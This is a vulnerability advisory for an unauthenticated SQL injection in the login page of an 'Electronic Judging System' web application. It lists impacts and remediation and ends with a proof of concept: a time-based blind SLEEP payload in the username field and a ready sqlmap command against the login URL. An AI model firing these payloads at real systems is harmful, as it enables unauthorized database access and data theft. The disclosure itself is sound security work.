# ITSOURCECODE Electronic Judging System Project V1.0 SQL Injection Vulnerability Summary ## Vulnerability Overview * **Vulnerability Type**: SQL Injection * **Affected Product**: Electronic Judging System Project V1.0 * **Vulnerable File**: `/intrams/login.php` * **Vulnerable Parameter**: `username` * **Exploitation Conditions**: No authentication or authorization required * **Root Cause**: Attackers inject malicious code via the `username` parameter, which is directly used in SQL queries without input validation. ## Impact Scope * Unauthorized access to the database * Leakage of sensitive data * Data tampering * System compromise * Service disruption ## Remediation 1. **Use Prepared Statements and Parameter Binding**: Prevent SQL injection by treating user input as data rather than executable code. 2. **Input Validation and Filtering**: Strictly validate user input to ensure it conforms to the expected format. 3. **Minimize Database User Privileges**: Use database accounts with the minimum necessary permissions; avoid using root/admin accounts. 4. **Regular Security Audits**: Conduct regular code and system security audits to identify and remediate vulnerabilities promptly. ## POC Code **Payload:** ```sql Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 6101 FROM (SELECT(SLEEP(5)))dQRM) AND 'LIVD'='LIVD&password=test ``` **sqlmap Command:** ```bash sqlmap -u "http://192.168.84.193/intrams/login.php" --data="username=admin&password=test" --dbms=mysql --batch ```